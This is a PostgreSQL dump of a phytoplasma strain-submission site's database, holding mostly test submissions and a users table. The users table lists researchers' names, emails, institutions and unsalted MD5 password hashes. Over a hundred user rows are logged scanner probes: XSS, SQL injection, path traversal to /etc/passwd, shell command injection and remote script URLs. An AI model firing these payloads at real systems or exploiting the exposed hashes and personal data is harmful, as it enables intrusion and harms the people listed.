--
-- PostgreSQL database dump
--

-- Dumped from database version 9.6.10
-- Dumped by pg_dump version 9.6.10

SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET client_min_messages = warning;
SET row_security = off;

--
-- Name: plpgsql; Type: EXTENSION; Schema: -; Owner: 
--

CREATE EXTENSION IF NOT EXISTS plpgsql WITH SCHEMA pg_catalog;


--
-- Name: EXTENSION plpgsql; Type: COMMENT; Schema: -; Owner: 
--

COMMENT ON EXTENSION plpgsql IS 'PL/pgSQL procedural language';


SET default_tablespace = '';

SET default_with_oids = false;

--
-- Name: submissions; Type: TABLE; Schema: public; Owner: postgres
--

CREATE TABLE public.submissions (
    id integer NOT NULL,
    email character varying(50) NOT NULL,
    species character varying(50) NOT NULL,
    strain character varying(50) NOT NULL,
    proposed_group_subgroup character varying(50) NOT NULL,
    genbank_cpn60ut_accession character varying(50) NOT NULL,
    group_16s_subgroup character varying(50) NOT NULL,
    genbank_16s_accession character varying(50) NOT NULL,
    host character varying(50) NOT NULL,
    country character varying(50) NOT NULL,
    reference character varying(50) NOT NULL,
    trn_date timestamp without time zone NOT NULL
);


ALTER TABLE public.submissions OWNER TO postgres;

--
-- Name: submissions_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--

CREATE SEQUENCE public.submissions_id_seq
    START WITH 1
    INCREMENT BY 1
    NO MINVALUE
    NO MAXVALUE
    CACHE 1;


ALTER TABLE public.submissions_id_seq OWNER TO postgres;

--
-- Name: submissions_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--

ALTER SEQUENCE public.submissions_id_seq OWNED BY public.submissions.id;


--
-- Name: users; Type: TABLE; Schema: public; Owner: postgres
--

CREATE TABLE public.users (
    id integer NOT NULL,
    email character varying(50) NOT NULL,
    firstname character varying(50) NOT NULL,
    lastname character varying(50) NOT NULL,
    academictitle character varying(50) NOT NULL,
    institution character varying(50) NOT NULL,
    country character varying(50) NOT NULL,
    password character varying(50) NOT NULL,
    trn_date timestamp without time zone NOT NULL
);


ALTER TABLE public.users OWNER TO postgres;

--
-- Name: users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--

CREATE SEQUENCE public.users_id_seq
    START WITH 1
    INCREMENT BY 1
    NO MINVALUE
    NO MAXVALUE
    CACHE 1;


ALTER TABLE public.users_id_seq OWNER TO postgres;

--
-- Name: users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--

ALTER SEQUENCE public.users_id_seq OWNED BY public.users.id;


--
-- Name: submissions id; Type: DEFAULT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public.submissions ALTER COLUMN id SET DEFAULT nextval('public.submissions_id_seq'::regclass);


--
-- Name: users id; Type: DEFAULT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public.users ALTER COLUMN id SET DEFAULT nextval('public.users_id_seq'::regclass);


--
-- Data for Name: submissions; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public.submissions (id, email, species, strain, proposed_group_subgroup, genbank_cpn60ut_accession, group_16s_subgroup, genbank_16s_accession, host, country, reference, trn_date) FROM stdin;
1	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 03:01:25
2	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 03:02:22
3	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 03:16:24
4	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 03:18:06
5	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 03:42:25
6	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 04:16:14
7	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 04:16:26
8	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 04:39:13
9	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 04:40:15
10	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 04:41:15
11	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 04:41:28
12	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 05:29:54
13	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 05:31:03
14	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 05:35:11
15	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 05:46:59
16	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 06:25:27
17	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 06:28:50
18	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:04:41
19	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:06:57
20	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:12:10
21	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:15:45
22	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:20:38
23	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:29:11
24	muirheadkevins@gmail.com	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-08-23 07:35:50
25	tim.dumonceaux@agr.gc.ca	Species	Strain	proposed_group_subgroup	genbank_cpn60ut_accession	L-I	MH279535	venus flytrap	Antarctica	not published yet!	2018-08-24 18:36:49
26	muirheadkevins@gmail.com	Ca. P. fakeii	fake-o-1	L-IA	genbank_cpn60ut_accession	16SrL	GBxxxx1987	plant	canada	yes	2018-08-25 01:18:54
27	muirheadkevins@gmail.com	Ca. P. fakeii	fake-o-1	L-IA	genbank_cpn60ut_accession	16SrL	GBxxxx1987	plant	canada	yes	2018-08-25 01:36:46
28	muirheadkevins@gmail.com	asteris	HJKI	IV-IZ	genbank_cpn60ut_accession	IV	GBxxxxx2	plant	canada	test	2018-09-05 09:43:47
29	muirheadkevins@gmail.com	Ca. P. fakeii	fake-o-1	L-IA	PUUG01000016	16SrL	GBxxxx	plant	canada	yes	2018-09-07 19:31:13
30	muirheadkevins@gmail.com	Ca. P. fakeii	fake-o-1	L-IA	PUUG01000016	16SrIV	GBxxxx1987	plant	canada	yes	2018-09-18 09:29:39
31	muirheadkevins@gmail.com	Ca. P. fakeii	fake-o-1	L-IA	PUUG01000016	16SrL	GBxxxx1987	plant	canada	yes	2018-10-02 01:44:21
32	muirheadkevins@gmail.com	Ca. P. fakeii	fake-o-1	L-IA	PUUG01000016	16SrL	GBxxxx1987	plant	canada	yes	2018-10-02 01:55:31
33	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	tes	tes	test	test	2019-02-23 06:22:25
34	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	test	test	test	test	2019-02-23 06:43:49
35	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	test	test	test	test	2019-02-23 08:16:44
36	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	test	test	test	test	2019-02-23 08:29:54
37	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	test	test	test	test	2019-02-23 08:38:50
38	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	test	test	test	test	2019-02-23 08:54:41
39	muirheadkevins@gmail.com	Phytoplasma	P. fakeii	IV-A	KY779619	test	test	test	test	test	2019-02-23 09:13:07
40	muirheadkevins@gmail.com	asteris	HJKI	IV-IZ	PUUG01000016	IV	GBxxxxx2	test1	test3	test4	2019-03-12 23:07:49
41	muirheadkevins@gmail.com	asteris	HJKI	IV-IZ	PUUG01000016	IV	GBxxxxx2	test1	Canada	test	2019-03-13 01:00:00
42	muirheadkevins@gmail.com	asteris	HJKI	IV-IZ	PUUG01000016	IV	MH279536	test1	Canada	test4	2019-03-13 01:14:54
43	muirheadkevins@gmail.com	asteris	HJKI	IV-IZ	PUUG01000016	IV-IZ	MH279536	test1	Canada	test4	2019-03-13 01:54:11
44	muirheadkevins@gmail.com	asteris	P. Fakeii	IV-IZ	PUUG01000016	IV-IZ	MH279536	test1	Canada	test4	2019-03-13 02:24:09
45	muirheadkevins@gmail.com	asteris	P. Fakeii	IV-IZ	PUUG01000016	IV-IZ	MH279536	test1	Canada	test4	2019-03-13 02:29:21
46	muirheadkevins@gmail.com	asteris	P. Fakeii	IV-IZ	PUUG01000016	IV-IZ	MH279536	test1	Canada	test4	2019-03-13 02:39:38
47	muirheadkevins@gmail.com	asteris	P. Fakeii	IX-IZ	PUUG01000016	IX-IZ	MH279536	test1	Canada	test4	2019-03-13 03:01:54
48	muirheadkevins@gmail.com	asteris	P. Fakeii	IX-IZ	PUUG01000016	IX-IZ	MH279536	test1	Canada	test	2019-03-13 03:11:26
49	muirheadkevins@gmail.com	asteris	P. Fakeii	IX-IZ	PUUG01000016	IX-IZ	MH279536	test1	Canada	test4	2019-03-13 03:15:05
50	muirheadkevins@gmail.com	asteris	P. Fakeii	IX-IZ	PUUG01000016	IX-IZ	MH279536	test1	Canada	test4	2019-03-13 03:22:29
51	muirheadkevins@gmail.com	asteris	P. Fakeii	IX-IZ	PUUG01000016	IX-IZ	MH279536	test1	Canada	test4	2019-03-13 04:06:18
\.


--
-- Name: submissions_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--

SELECT pg_catalog.setval('public.submissions_id_seq', 51, true);


--
-- Data for Name: users; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public.users (id, email, firstname, lastname, academictitle, institution, country, password, trn_date) FROM stdin;
6	epl733@mail.usask.ca	Edel	Lopez	Dr.	University of Saskatchewan	CA	c26981ffe3fcaa5bca9c42fb8c3045c0	2018-08-05 19:02:20
7	tim.dumonceaux@agr.gc.ca	Tim	Dumonceaux	Dr.	Agriculture and Agri-Food Canada	CA	3d608157733f45f42fad165ef295d770	2018-08-07 17:55:44
8	muirheadkevins@gmail.com	Kevin	Muirhead	None	University of Calgary	CA	202de2ef14309dd635b52efce52aece4	2019-02-23 06:18:48
9	Stefano.Costanzo@usda.gov	Stefano	Costanzo	Dr.	USDA APHIS PPQ	US	e923e884e0a5299fdaa46b6d31b58789	2019-04-26 00:36:37
10							d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:22:04
11	329140						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:22:05
12	http://rfi.nessus.org/rfi.txt						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:24:34
13	http://ehJvOl5q.example.com/						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:24:35
14	mmmumx						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:24:37
15	313001			http://rfi.nessus.org/rfi.txt			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:24:47
16	6505						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:24:47
17	 ADw-script AD4-alert(202) ADw-/script AD4-						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:51
18	><scr<script>ipt>alert(217)</scr</script>ipt>						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:53
19	"><img src=1 onerror=javascript:alert(205)>						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:54
20	<						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:54
21	%u00ABscript%u00BBalert(209);%u00AB/script%u00BB						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:55
22	P.HNjcmlwdD5hbGVydCg5OCk7PC9zY3JpcHQ 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:58
23	j						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:27:59
24	"><script > alert(201); </script >						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:28:00
25	295274						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:29:16
26	<"gvytmw\n>						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:10
27	msgbox("foo");window.alert('bar');						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:10
28	504 onerror="alert(504);						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:10
29	508 src=http://www.example.com/exploit508.js						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:11
30	onmouseover=alert(502)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:12
31	509" src="http://www.example.com/exploit509.js						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:13
32	506;alert(506)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:13
33	510' src='http://www.example.com/exploit510.js						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:14
34	javascript:alert(501)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:15
35	503" onerror="alert(503);						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:16
36	<script>document.cookie="testunnp=9360;"</script>						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:16
37	505' onMouseOver='alert(505);						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:17
38	../admin/noop.cgi?foo=bar						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:18
39	\r\nX-foo: bar						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:19
40	961776			<script>document.cookie="testunnp=9360;"</script>			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:26
41	<IMG SRC="javascript:alert(104);">						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:34:34
42	.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:13
43	https://www.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:15
44	http://www.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:16
45	136156			<IMG SRC="javascript:alert(104);">			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:16
46	HtTp://www.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:17
47	%68%74%74%70%3a%2f%2fwww.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:18
48	www.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:19
49	 http://www.example.com						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:35:20
50	655165						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:23
51	' convert(int,convert(varchar,0x7b5d)) '						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:23
52	'--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:24
53	convert(varchar,0x7b5d)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:25
54	"						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:26
55	/*						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:28
56	;						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:29
57	 or 1=1-- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:30
58	bad_bad_value'						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:32
59	whatever)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:32
60	' convert(varchar,0x7b5d) '						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:33
61	convert(int,convert(varchar,0x7b5d))						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:34
62	#						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:35
63	'"						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:36
64	'+convert(varchar,0x7b5d)+'						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:38
65	'+convert(int,convert(varchar,0x7b5d))+'						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:39
66	%27						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:40
67	'						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:41
68	9, 9, 9						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:42
69	-- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:45
70	char(39)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:46
71	' or 1=1-- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:37:48
72	<foo>bar</ foo>						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:45:16
73	./../././../././../././.././etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:46:26
74	..../..../..../..../..../..../..../..../etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:46:28
75	11773			./../././../././../././.././etc/passwd			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:46:51
76	../../../../../../../etc						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:08
77	../../../../../../../../etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:09
78	../../../../../../../../etc						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:10
79	/etc						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:10
80	../../../../../../../../windows/win.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:11
81	..................boot.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:12
82	...........................boot.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:13
83	................winntwin.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:14
84	..............windows						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:15
85	....................................boot.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:16
86	Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAo=						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:16
87	../../../../../../../winnt						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:19
88	../../../../../../../windows						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:20
89	/etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:21
90	..............winnt						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:22
91	.../.../.../.../.../.../.../.../etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:23
92	................windowswin.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:25
93	../../../../../../../etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:26
94	../../../../../../../../../boot.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:27
95	../../../../../../../../winnt/win.ini						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:27
96	`/etc/passwd`						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:47:28
97	; passthru('id'); die						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:03
98	;echo NeS  SuS						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:04
99	\nid						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:05
100	|cat /etc/passwd|						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:06
101	x\ncat /etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:07
102	<?php passthru('id'); die; ?>						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:08
103	{id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:09
104	passthru('id')						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:09
105	&id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:10
106	|/bin/id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:12
107	;id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:13
108	;/usr/bin/id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:13
109	|id|						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:15
110	|id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:16
111	\ncat /etc/passwd						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:18
112	|/usr/bin/id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:19
113	;/bin/id						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:22
114	459731			../../../../../../../etc			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:22
115	echo NeS  SuS						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:49:26
116	384604			; passthru('id'); die			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:51:17
117	registration.php						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:56:53
118	registration.php/.						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:56:56
119	147830			registration.php			d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:57:13
120	 ; x || sleep 3 &						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:57:14
121	 ; x || sleep 5 &						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:57:17
122	 ; x || sleep 8 &						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:57:22
123	 ; x || sleep 13 &						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:57:30
124	 ; x || sleep 21 &						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:57:44
125	' AND SLEEP(3)='						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:40
126	 AND SLEEP(3)=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:40
127	 AND 0 IN (SELECT SLEEP(3)) -- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:40
128	' AND 0 IN (SELECT SLEEP(3)) -- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:40
129	';WAITFOR DELAY '00:00:3';--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
130	');WAITFOR DELAY '00:00:3';--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
131	'));WAITFOR DELAY '00:00:3';--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
132	;WAITFOR DELAY '00:00:3';--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
133	);WAITFOR DELAY '00:00:3';--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
134	));WAITFOR DELAY '00:00:3';--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
135	';SELECT pg_sleep(3);--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:41
136	');SELECT pg_sleep(3);--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:42
137	'));SELECT pg_sleep(3);--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:42
138	;SELECT pg_sleep(3);--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:42
139	);SELECT pg_sleep(3);--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:42
140	));SELECT pg_sleep(3);--						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 06:59:42
141	' and 'b'>'a						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:14
142	' and 'b'<'a						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:14
143	 and 1=1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:14
144	 and 1=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:14
145	 and 1=1)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:14
146	 and 1=0)						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:15
147	 and 1=1;-- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:15
148	 and 1=0;-- 						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:15
149	 or 1=1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:15
150	 or 1=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:15
151	' or '1'='1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:15
152	' or '1'='0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
153	) or (1=1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
154	) or (1=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
155	') or ('1'='1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
156	') or ('1'='0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
157	 or 1=1 or 1=1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
158	 or 1=0 or 1=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:16
159	' or 1=1 or '1'='1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
160	' or 1=0 or '1'='0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
161	) or 1=1 or (1=1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
162	) or 1=0 or (1=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
163	') or 1=1 or ('1'='1						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
164	') or 1=0 or ('1'='0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
165	 + 0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:17
166	 + 42						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:18
167	' or 'b'='a						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:18
168	' or 'b'='b						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:18
169	 or 0=0						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:18
170	yy						d41d8cd98f00b204e9800998ecf8427e	2019-06-16 07:01:18
171	stefano.costanzo@usda.gov	Stefano	Costanzo	Dr.	USDA	US	e923e884e0a5299fdaa46b6d31b58789	2019-11-19 15:19:45
172	milakdf78@mail.ru	Davidtwice	DamefLH	Prof.	Director	VA	7284210e6df1e5d2e6125ca46673cd9a	2020-08-15 03:32:24
173	jayheisavetheworld@gmail.com	PKSDRCRRDV83M4MEO2Y7HSKP http://mail.com/820	PKSDRCRRDV83M4MEO2Y7HSKP http://mail.com/820	Dr.	6	SY	71924fde3e764b9d7007fc75f732d002	2021-02-17 11:38:58
\.


--
-- Name: users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--

SELECT pg_catalog.setval('public.users_id_seq', 173, true);


--
-- Name: submissions submissions_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public.submissions
    ADD CONSTRAINT submissions_pkey PRIMARY KEY (id);


--
-- Name: users users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public.users
    ADD CONSTRAINT users_pkey PRIMARY KEY (id);


--
-- PostgreSQL database dump complete
--

